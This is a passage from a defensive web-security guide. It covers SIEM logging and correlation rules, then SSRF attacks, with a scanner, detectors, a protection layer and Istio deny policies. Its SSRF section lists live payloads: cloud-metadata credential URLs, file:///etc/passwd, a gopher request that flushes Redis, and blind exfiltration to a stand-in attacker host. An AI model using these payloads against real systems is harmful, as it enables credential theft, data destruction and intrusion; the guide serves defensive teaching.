if sink.type == 'file':
self.write_to_file(sink, log_entry)
elif sink.type == 'syslog':
self.write_to_syslog(sink, log_entry)
elif sink.type == 'elasticsearch':
self.write_to_elasticsearch(sink, log_entry)
elif sink.type == 'splunk':
self.write_to_splunk(sink, log_entry)
elif sink.type == 'cloudwatch':
self.write_to_cloudwatch(sink, log_entry)
elif sink.type == 'kafka':
self.write_to_kafka(sink, log_entry)
except Exception as e:
# Don't let logging failures break application
self.handle_logging_failure(sink, log_entry, e)
def write_to_file(self, sink, log_entry):
"""
Write log entry to file with rotation and compression
"""
log_file = self.get_current_log_file(sink)
# Ensure directory exists
os.makedirs(os.path.dirname(log_file), exist_ok=True)
# Write log entry
with open(log_file, 'a') as f:
# Format based on sink configuration
if sink.format == 'json':
f.write(json.dumps(log_entry) + '\n')
elif sink.format == 'cef':
f.write(self.format_as_cef(log_entry) + '\n')
elif sink.format == 'leef':
f.write(self.format_as_leef(log_entry) + '\n')
else: # Default to JSON
f.write(json.dumps(log_entry) + '\n')
# Check if rotation is needed
self.check_and_rotate(log_file, sink)Security Information and Event Management (SIEM) Integration
# siem-integration.yml
version: '1.0'
name: Application SIEM Integration
description: Comprehensive SIEM integration configuration
metadata:
application: Production Web Application
environment: production
compliance:
- PCI-DSS
- HIPAA
- GDPR
- SOC2
log_sources:
- type: application_logs
format: json
schema: structured
fields:
mandatory:
- timestamp
- event_type
- user_id
- severity
- component
sensitive:
- password
- token
- credit_card
- ssn
transport:
protocol: tls
compression: gzip
batch_size: 1000
batch_timeout: 5s
- type: web_server_logs
format: combined
source: nginx
fields:
mandatory:
- remote_addr
- time_local
- request
- status
- body_bytes_sent
enrichment:
- geoip
- user_agent_parsing
transport:
protocol: syslog
facility: local7
severity_field: status
- type: database_logs
format: csv
source: postgresql
fields:
mandatory:
- timestamp
- user
- database
- query_type
- duration
sensitive:
- query_parameters
transport:
protocol: kafka
topic: database-audit-logs
partition_key: user
- type: kubernetes_logs
format: json
source: fluentd
fields:
mandatory:
- timestamp
- namespace
- pod
- container
- message
transport:
protocol: http
endpoint: /logs/kubernetes
parsing_rules:
authentication_events:
pattern: 'event_type: "(successful_login|failed_login|logout)"'
fields:
- name: auth_event_type
value: $1
- name: risk_score
calculation: |
$auth_event_type == 'failed_login' ? 30 :
$auth_event_type == 'successful_login' ? 10 : 0
sql_injection_attempts:
pattern: 'query: ".*(SELECT|UNION|DROP|INSERT|UPDATE).*"'
condition: 'event_type == "database_query"'
fields:
- name: attack_type
value: 'sql_injection'
- name: severity
value: 'high'
sensitive_data_access:
pattern: 'data_type: "(pii|phi|financial)"'
fields:
- name: sensitivity_level
mapping:
pii: 'medium'
phi: 'high'
financial: 'high'
- name: requires_alert
value: true
correlation_rules:
brute_force_detection:
description: 'Multiple failed logins from same source'
events:
- type: failed_login
condition: 'success == false'
grouping:
- field: source_ip
- field: user_id
time_window: 300 # 5 minutes
threshold: 5
actions:
- type: alert
severity: high
- type: block_ip
duration: 3600 # 1 hour
data_exfiltration:
description: 'Large volume of sensitive data access'
events:
- type: data_access
condition: 'sensitivity_level == "high"'
grouping:
- field: user_id
time_window: 3600 # 1 hour
threshold:
record_count: 10000
data_size: 100000000 # 100MB
actions:
- type: alert
severity: critical
- type: suspend_user
- type: notify_team
team: security_operations
lateral_movement:
description: 'Access from multiple internal IPs in short time'
events:
- type: successful_login
grouping:
- field: user_id
time_window: 600 # 10 minutes
threshold:
unique_ips: 3
actions:
- type: alert
severity: medium
- type: require_mfa
retention_policies:
raw_logs:
duration: 30d
compression: gzip
encryption: aes-256-gcm
storage_class: standard
security_events:
duration: 1y
compression: none
encryption: aes-256-gcm
storage_class: infrequent_access
indexing: full_text
compliance_logs:
duration: 7y # For regulatory compliance
compression: gzip
encryption: aes-256-gcm
storage_class: glacier
write_once_read_many: true
alerting:
channels:
- type: email
recipients:
- security-team@company.com
- on-call@company.com
conditions:
- severity: critical
- severity: high
- type: slack
channel: '#security-alerts'
conditions:
- severity: critical
- severity: high
- severity: medium
- type: pagerduty
service: security-operations
conditions:
- severity: critical
- type: webhook
url: https://internal-dashboard/alerts
conditions:
- severity: critical
- severity: high
escalation_policies:
- level: 1
timeout: 15m
notify: ['security-analyst']
- level: 2
timeout: 30m
notify: ['security-engineer', 'team-lead']
- level: 3
timeout: 1h
notify: ['security-manager', 'director']
dashboard:
security_overview:
widgets:
- type: timeseries
title: 'Security Events Over Time'
metrics:
- failed_logins
- successful_logins
- access_denied
time_range: 24h
- type: top_n
title: 'Top Source IPs for Failed Logins'
metric: failed_logins
group_by: source_ip
limit: 10
- type: gauge
title: 'Current Risk Score'
metric: risk_score
thresholds:
green: 0-30
yellow: 31-70
red: 71-100
- type: table
title: 'Recent Security Incidents'
columns:
- timestamp
- event_type
- user_id
- source_ip
- severity
limit: 20
refresh: 30sSSRF Evolution Beyond Basic URL Fetching
- Protocol Smuggling: Using lesser-known protocols (gopher, dict, file)
- DNS Rebinding: Time-of-check to time-of-use attacks
- Cloud Metadata API Exploitation: IAM role credential theft
- Internal Service Enumeration: Port scanning via SSRF
- Blind SSRF: Out-of-band data exfiltration
- SSRF Chaining: Using one SSRF to trigger another
Advanced SSRF Payloads
# Protocol-based payloads
payloads:
# Cloud metadata services
aws_metadata: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
gcp_metadata: "http://metadata.google.internal/computeMetadata/v1/"
azure_metadata: "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Internal services
localhost: "http://localhost:8080/admin"
docker_socket: "http://localhost:2375/version"
redis: "http://localhost:6379"
# Protocol smuggling
file_protocol: "file:///etc/passwd"
gopher_protocol: "gopher://localhost:6379/_*1%0d%0a$8%0d%0aflushall%0d%0aquit%0d%0a"
dict_protocol: "dict://localhost:6379/info"
# DNS rebinding
dns_rebinding: "http://attacker-controlled-domain.com/"
# Time-based attacks
time_based: "http://localhost:22" # Check response time for open ports
# Blind SSRF
blind_exfiltration: "http://attacker-server.com/leak?data=SECRET"
# SSRF to RCE chains
rce_chain: "http://localhost:8080/actuator/gateway/routes/new-route"SSRF Vulnerability Scanner
class SSRFScanner:
def __init__(self, target_application):
self.target = target_application
self.payload_generator = SSRFPayloadGenerator()
self.response_analyzer = ResponseAnalyzer()
self.out_of_band_detector = OutOfBandDetector()
def comprehensive_scan(self):
"""
Comprehensive SSRF vulnerability scan
"""
findings = []
# Phase 1: Parameter discovery
ssrf_parameters = self.discover_ssrf_parameters()
# Phase 2: Payload testing
for param in ssrf_parameters:
param_findings = self.test_parameter(param)
findings.extend(param_findings)
# Phase 3: Protocol testing
protocol_findings = self.test_protocols()
findings.extend(protocol_findings)
# Phase 4: Blind SSRF testing
blind_findings = self.test_blind_ssrf()
findings.extend(blind_findings)
# Phase 5: Cloud metadata testing
cloud_findings = self.test_cloud_metadata()
findings.extend(cloud_findings)
return self.prioritize_findings(findings)
def discover_ssrf_parameters(self):
"""
Discover potential SSRF parameters
"""
parameters = []
# Analyze application for URL parameters
endpoints = self.target.discover_endpoints()
for endpoint in endpoints:
# Look for URL-like parameters
param_patterns = [
r'url', r'uri', r'path', r'file', r'page',
r'image', r'fetch', r'load', r'src', r'dest',
r'redirect', r'return', r'next', r'callback',
r'webhook', r'proxy', r'api', r'endpoint'
]
for param_name in endpoint.parameters:
if any(pattern in param_name.lower() for pattern in param_patterns):
parameters.append({
'endpoint': endpoint.url,
'method': endpoint.method,
'parameter': param_name,
'type': endpoint.parameters[param_name]
})
# Also check for hidden parameters
hidden_params = self.find_hidden_parameters()
parameters.extend(hidden_params)
return parameters
def test_parameter(self, parameter):
"""
Test a specific parameter for SSRF vulnerabilities
"""
findings = []
# Generate test payloads
payloads = self.payload_generator.generate_payloads(
parameter['type']
)
for payload in payloads:
# Send request with payload
response = self.send_request(
parameter['endpoint'],
parameter['method'],
{parameter['parameter']: payload}
)
# Analyze response
analysis = self.response_analyzer.analyze(response)
if analysis.is_vulnerable:
findings.append({
'type': 'ssrf_vulnerability',
'endpoint': parameter['endpoint'],
'parameter': parameter['parameter'],
'payload': payload,
'evidence': analysis.evidence,
'severity': self.calculate_severity(payload, analysis),
'description': f'SSRF vulnerability in {parameter["parameter"]} parameter'
})
# Check for blind SSRF
blind_detection = self.out_of_band_detector.check(
payload,
response
)
if blind_detection.detected:
findings.append({
'type': 'blind_ssrf',
'endpoint': parameter['endpoint'],
'parameter': parameter['parameter'],
'payload': payload,
'evidence': blind_detection.evidence,
'severity': 'Medium',
'description': f'Blind SSRF vulnerability in {parameter["parameter"]} parameter'
})
return findings
def test_protocols(self):
"""
Test various protocols for SSRF
"""
findings = []
protocols = [
'file', 'gopher', 'dict', 'ldap', 'ldaps',
'ftp', 'sftp', 'tftp', 'smb', 'nfs',
'jar', 'netdoc', 'mailto', 'telnet'
]
for protocol in protocols:
# Test protocol handler
payload = f"{protocol}://localhost/test"
response = self.test_protocol_handler(payload)
if response.handled:
findings.append({
'type': 'protocol_handler_enabled',
'protocol': protocol,
'severity': 'High',
'description': f'{protocol} protocol handler is enabled and may be exploitable'
})
return findings
def test_blind_ssrf(self):
"""
Test for blind SSRF vulnerabilities
"""
findings = []
# Generate unique identifier for this test
test_id = self.generate_test_id()
# Create payloads that would trigger out-of-band interactions
payloads = self.payload_generator.generate_blind_payloads(test_id)
for payload in payloads:
# Send request
response = self.send_request_with_payload(payload)
# Monitor for out-of-band interactions
detection = self.out_of_band_detector.monitor(
test_id,
timeout=30 # Wait 30 seconds for callback
)
if detection.received:
findings.append({
'type': 'blind_ssrf_confirmed',
'payload': payload,
'callback_data': detection.data,
'severity': 'High',
'description': 'Blind SSRF confirmed via out-of-band interaction'
})
return findings
def test_cloud_metadata(self):
"""
Test for cloud metadata service access
"""
findings = []
cloud_metadata_endpoints = [
# AWS
'http://169.254.169.254/',
'http://169.254.169.254/latest/meta-data/',
'http://169.254.169.254/latest/user-data/',
'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
# GCP
'http://metadata.google.internal/',
'http://metadata.google.internal/computeMetadata/v1/',
'http://169.254.169.254/computeMetadata/v1/',
# Azure
'http://169.254.169.254/metadata/instance',
'http://169.254.169.254/metadata/instance?api-version=2021-02-01',
# DigitalOcean
'http://169.254.169.254/metadata/v1/',
# Oracle Cloud
'http://192.0.0.192/latest/',
# Alibaba Cloud
'http://100.100.100.200/latest/meta-data/',
# Kubernetes
'https://kubernetes.default.svc/',
'https://kubernetes.default.svc/api/v1/namespaces/default/secrets/'
]
for endpoint in cloud_metadata_endpoints:
# Test access
response = self.test_endpoint_access(endpoint)
if response.accessible:
findings.append({
'type': 'cloud_metadata_accessible',
'endpoint': endpoint,
'response_sample': response.sample,
'severity': 'Critical',
'description': f'Cloud metadata endpoint accessible: {endpoint}'
})
return findingsAdvanced SSRF Detection via Behavioral Analysis
class BehavioralSSRFDetector:
def __init__(self):
self.request_baselines = {}
self.network_baselines = {}
self.anomaly_detector = AnomalyDetector()
def monitor_requests(self, request):
"""
Monitor outgoing requests for SSRF patterns
"""
anomalies = []
# Extract URL from request
url = request.get('url', '')
# Check against deny list
if self.is_denied_destination(url):
anomalies.append({
'type': 'denied_destination',
'url': url,
'severity': 'High'
})
# Check for internal network access
if self.is_internal_network(url):
anomalies.append({
'type': 'internal_network_access',
'url': url,
'severity': 'High'
})
# Check for cloud metadata access
if self.is_cloud_metadata(url):
anomalies.append({
'type': 'cloud_metadata_access',
'url': url,
'severity': 'Critical'
})
# Behavioral analysis
client_id = request.get('client_id', 'unknown')
# Update baseline
self.update_baseline(client_id, request)
# Check for anomalies
baseline = self.request_baselines.get(client_id)
if baseline:
# Check request frequency
if self.is_frequency_anomaly(client_id, request, baseline):
anomalies.append({
'type': 'request_frequency_anomaly',
'client_id': client_id,
'severity': 'Medium'
})
# Check destination anomaly
if self.is_destination_anomaly(client_id, url, baseline):
anomalies.append({
'type': 'destination_anomaly',
'client_id': client_id,
'url': url,
'severity': 'Medium'
})
# Check protocol anomaly
if self.is_protocol_anomaly(url, baseline):
anomalies.append({
'type': 'protocol_anomaly',
'client_id': client_id,
'url': url,
'severity': 'High'
})
# Network behavior analysis
network_anomalies = self.analyze_network_behavior(request)
anomalies.extend(network_anomalies)
return anomalies
def is_internal_network(self, url):
"""
Check if URL points to internal network
"""
try:
hostname = urlparse(url).hostname
if not hostname:
return False
# Resolve hostname to IP
ip_address = socket.gethostbyname(hostname)
# Check against internal IP ranges
internal_ranges = [
ipaddress.ip_network('10.0.0.0/8'),
ipaddress.ip_network('172.16.0.0/12'),
ipaddress.ip_network('192.168.0.0/16'),
ipaddress.ip_network('127.0.0.0/8'),
ipaddress.ip_network('169.254.0.0/16'), # Link-local
ipaddress.ip_network('::1/128') # IPv6 localhost
]
ip = ipaddress.ip_address(ip_address)
for network in internal_ranges:
if ip in network:
return True
# Check for localhost variants
if hostname in ['localhost', 'local', '127.0.0.1', '::1']:
return True
# Check for Docker bridge network
if ip_address.startswith('172.17.'):
return True
except (socket.gaierror, ValueError):
# Could not parse or resolve
pass
return False
def is_cloud_metadata(self, url):
"""
Check if URL points to cloud metadata service
"""
cloud_metadata_hosts = [
'169.254.169.254', # AWS, GCP, Azure, etc.
'metadata.google.internal',
'metadata.google.internal.',
'metadata', # Kubernetes
'kubernetes.default.svc',
'192.0.0.192', # Oracle Cloud
'100.100.100.200', # Alibaba Cloud
]
try:
hostname = urlparse(url).hostname
if hostname in cloud_metadata_hosts:
return True
# Check for metadata path patterns
metadata_paths = [
'/latest/meta-data',
'/metadata/instance',
'/computeMetadata/v1',
'/metadata/v1'
]
path = urlparse(url).path
for metadata_path in metadata_paths:
if path.startswith(metadata_path):
return True
except:
pass
return False
def analyze_network_behavior(self, request):
"""
Analyze network behavior for SSRF patterns
"""
anomalies = []
# Check for port scanning patterns
if self.is_port_scanning_pattern(request):
anomalies.append({
'type': 'port_scanning_pattern',
'request': request,
'severity': 'High'
})
# Check for service enumeration
if self.is_service_enumeration(request):
anomalies.append({
'type': 'service_enumeration',
'request': request,
'severity': 'High'
})
# Check for data exfiltration patterns
if self.is_data_exfiltration(request):
anomalies.append({
'type': 'data_exfiltration',
'request': request,
'severity': 'Critical'
})
return anomaliesComprehensive SSRF Protection Layer
class SSRFProtectionLayer:
def __init__(self):
self.url_validator = URLValidator()
self.dns_resolver = DNSResolver()
self.network_filter = NetworkFilter()
self.request_sanitizer = RequestSanitizer()
self.rate_limiter = RateLimiter()
def process_request(self, request):
"""
Process and validate outgoing requests
"""
# Extract URL
url = request.get('url')
if not url:
raise SSRFProtectionError('No URL provided')
# Step 1: URL Validation
validation_result = self.url_validator.validate(url)
if not validation_result.valid:
raise SSRFProtectionError(
f'URL validation failed: {validation_result.reason}'
)
# Step 2: DNS Resolution and Filtering
resolution_result = self.dns_resolver.resolve_and_filter(url)
if not resolution_result.allowed:
raise SSRFProtectionError(
f'Destination not allowed: {resolution_result.reason}'
)
# Step 3: Network Layer Filtering
network_result = self.network_filter.check(url)
if not network_result.allowed:
raise SSRFProtectionError(
f'Network access not allowed: {network_result.reason}'
)
# Step 4: Request Sanitization
sanitized_request = self.request_sanitizer.sanitize(request)
# Step 5: Rate Limiting
client_id = request.get('client_id', 'default')
if not self.rate_limiter.check(client_id, url):
raise SSRFProtectionError('Rate limit exceeded')
# Step 6: Create safe request
safe_request = self.create_safe_request(sanitized_request, resolution_result)
return safe_request
def validate_url(self, url):
"""
Comprehensive URL validation
"""
try:
parsed = urlparse(url)
# Check scheme
allowed_schemes = ['http', 'https']
if parsed.scheme not in allowed_schemes:
return ValidationResult(
valid=False,
reason=f'Protocol not allowed: {parsed.scheme}'
)
# Check hostname
if not parsed.hostname:
return ValidationResult(
valid=False,
reason='No hostname specified'
)
# Check for malicious patterns
malicious_patterns = [
r'\.\.', # Directory traversal
r'%00', # Null byte
r'\\x', # Hex encoding
r'\\u', # Unicode encoding
r'<!--', # HTML comment
r'javascript:', # JavaScript protocol
r'data:', # Data protocol
]
for pattern in malicious_patterns:
if re.search(pattern, url, re.IGNORECASE):
return ValidationResult(
valid=False,
reason=f'Malicious pattern detected: {pattern}'
)
# Check URL length
if len(url) > 2048:
return ValidationResult(
valid=False,
reason='URL too long'
)
# Check for IP addresses in URL
ip_pattern = r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
if re.match(ip_pattern, parsed.hostname):
return ValidationResult(
valid=False,
reason='IP addresses not allowed in URLs'
)
return ValidationResult(valid=True)
except Exception as e:
return ValidationResult(
valid=False,
reason=f'URL parsing error: {str(e)}'
)
def resolve_and_filter(self, url):
"""
Resolve DNS and apply filtering rules
"""
try:
parsed = urlparse(url)
hostname = parsed.hostname
# Resolve DNS
ip_addresses = socket.getaddrinfo(
hostname,
None,
socket.AF_UNSPEC
)
# Extract IP addresses
ips = []
for family, _, _, _, sockaddr in ip_addresses:
if family == socket.AF_INET:
ips.append(sockaddr[0])
elif family == socket.AF_INET6:
ips.append(sockaddr[0])
# Apply filtering rules
for ip in ips:
# Check against deny list
if self.is_denied_ip(ip):
return ResolutionResult(
allowed=False,
reason=f'IP address denied: {ip}',
ip_addresses=ips
)
# Check against internal ranges
if self.is_internal_ip(ip):
return ResolutionResult(
allowed=False,
reason=f'Internal IP address: {ip}',
ip_addresses=ips
)
# Check for cloud metadata
if self.is_cloud_metadata_ip(ip):
return ResolutionResult(
allowed=False,
reason=f'Cloud metadata IP: {ip}',
ip_addresses=ips
)
# Check against allow list if configured
if self.has_allow_list():
if not self.is_allowed_hostname(hostname):
return ResolutionResult(
allowed=False,
reason=f'Hostname not in allow list: {hostname}',
ip_addresses=ips
)
return ResolutionResult(
allowed=True,
ip_addresses=ips,
hostname=hostname
)
except socket.gaierror:
return ResolutionResult(
allowed=False,
reason=f'Could not resolve hostname: {hostname}'
)
except Exception as e:
return ResolutionResult(
allowed=False,
reason=f'DNS resolution error: {str(e)}'
)
def is_internal_ip(self, ip):
"""
Check if IP address is internal
"""
try:
ip_obj = ipaddress.ip_address(ip)
internal_ranges = [
ipaddress.ip_network('10.0.0.0/8'),
ipaddress.ip_network('172.16.0.0/12'),
ipaddress.ip_network('192.168.0.0/16'),
ipaddress.ip_network('127.0.0.0/8'),
ipaddress.ip_network('169.254.0.0/16'),
ipaddress.ip_network('::1/128'),
ipaddress.ip_network('fc00::/7'), # IPv6 unique local
ipaddress.ip_network('fe80::/10'), # IPv6 link-local
]
for network in internal_ranges:
if ip_obj in network:
return True
# Docker bridge network
if ip.startswith('172.17.'):
return True
# Kubernetes services
if ip.startswith('10.') and ip.count('.') == 3:
# Check if it's a typical Kubernetes service IP
second_octet = int(ip.split('.')[1])
if 0 <= second_octet <= 255:
# Could be Kubernetes, need additional checks
return True
return False
except ValueError:
return FalseCloud-Native SSRF Protection with Service Mesh
# service-mesh-ssrf-protection.yaml
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: ssrf-protection
namespace: production
spec:
selector:
matchLabels:
app: external-api-consumer
action: DENY
rules:
# Rule 1: Deny requests to internal IP ranges
- to:
- operation:
hosts:
- "10.0.0.0/8"
- "172.16.0.0/12"
- "192.168.0.0/16"
- "127.0.0.0/8"
- "169.254.0.0/16"
- "::1/128"
# Rule 2: Deny requests to cloud metadata
- to:
- operation:
hosts:
- "169.254.169.254"
- "metadata.google.internal"
- "192.0.0.192"
- "100.100.100.200"
# Rule 3: Allow only specific external domains
- to:
- operation:
notHosts:
- "api.stripe.com"
- "api.twilio.com"
- "webhook.slack.com"
- "hooks.zapier.com"
when:
- key: request.headers[user-agent]
values:
- "external-api-consumer/*"
# Rule 4: Rate limiting
- to:
- operation:
hosts: ["*"]
when:
- key: connection.sni
notValues: ["allowed-external.com"]
- key: "ratelimit.requests"
values: ["exceeded"]
# Rule 5: Protocol restrictions
- to:
- operation:
ports: ["80", "443"]
when:
- key: "network.protocol"
notValues: ["tcp"]
---
apiVersion: networking.istio.io/v1beta1
kind: ServiceEntry
metadata:
name: external-services
namespace: production
spec:
hosts:
- api.stripe.com
- api.twilio.com
- webhook.slack.com
- hooks.zapier.com
ports:
- number: 443
name: https
protocol: HTTPS
- number: 80
name: http
protocol: HTTP
resolution: DNS
location: MESH_EXTERNAL
---
apiVersion: security.istio.io/v1beta1
kind: RequestAuthentication
metadata:
name: external-api-auth
namespace: production
spec:
selector:
matchLabels:
app: external-api-consumer
jwtRules:
- issuer: "https://auth.company.com/"
jwksUri: "https://auth.company.com/.well-known/jwks.json"
fromHeaders:
- name: "X-API-Key"
outputPayloadToHeader: "x-jwt-payload"
---
apiVersion: telemetry.istio.io/v1alpha1
kind: Telemetry
metadata:
name: external-requests-metrics
namespace: production
spec:
selector:
matchLabels:
app: external-api-consumer
metrics:
- providers:
- name: prometheus
overrides:
- match:
metric: REQUEST_COUNT
mode: CLIENT
tagOverrides:
destination_host:
operation: UPSERT
value: "request.host"
destination_ip:
operation: UPSERT
value: "destination.ip"
response_code:
operation: UPSERT
value: "response.code"
ssrf_attempt:
operation: UPSERT
value: "conditional((request.host == '169.254.169.254'), 'true', 'false')"The OWASP Top 10 vulnerabilities represent not just technical flaws, but fundamental gaps in our approach to application security. As we've explored in this comprehensive guide, modern applications face sophisticated threats that require equally sophisticated defenses.
-
Shift-Left Security Integration
- Security requirements defined during design phase
- Automated security testing in CI/CD pipelines
- Developer security training and awareness
-
Zero-Trust Architecture Adoption
- Never trust, always verify
- Micro-segmentation and least privilege
- Continuous authentication and authorization
-
AI and Machine Learning in Security
- Behavioral anomaly detection
- Automated threat hunting
- Predictive vulnerability assessment
-
Supply Chain Security Focus
- Software Bill of Materials (SBOM) adoption
- Provenance and integrity verification
- Dependency vulnerability management
-
Privacy by Design
- Data minimization and anonymization
- Privacy-preserving computation
- Regulatory compliance automation
-
Adopt a Defense-in-Depth Strategy
- Multiple layers of security controls
- Fail-secure design principles
- Regular security testing and assessment
-
Implement Continuous Security Monitoring
- Real-time threat detection
- Automated incident response
- Security metrics and reporting
-
Foster Security Culture
- Security champions program
- Regular training and awareness
- Bug bounty and responsible disclosure
-
Embrace Security Automation
- Infrastructure as Code with security baked in
- Automated compliance checking
- Self-healing security systems
-
Prepare for Quantum Computing
- Post-quantum cryptography migration
- Quantum-resistant algorithms
- Crypto-agility frameworks
The landscape of web application security is constantly evolving, but by understanding these fundamental vulnerabilities and implementing comprehensive defenses, organizations can significantly reduce their risk exposure and build more secure applications for the future.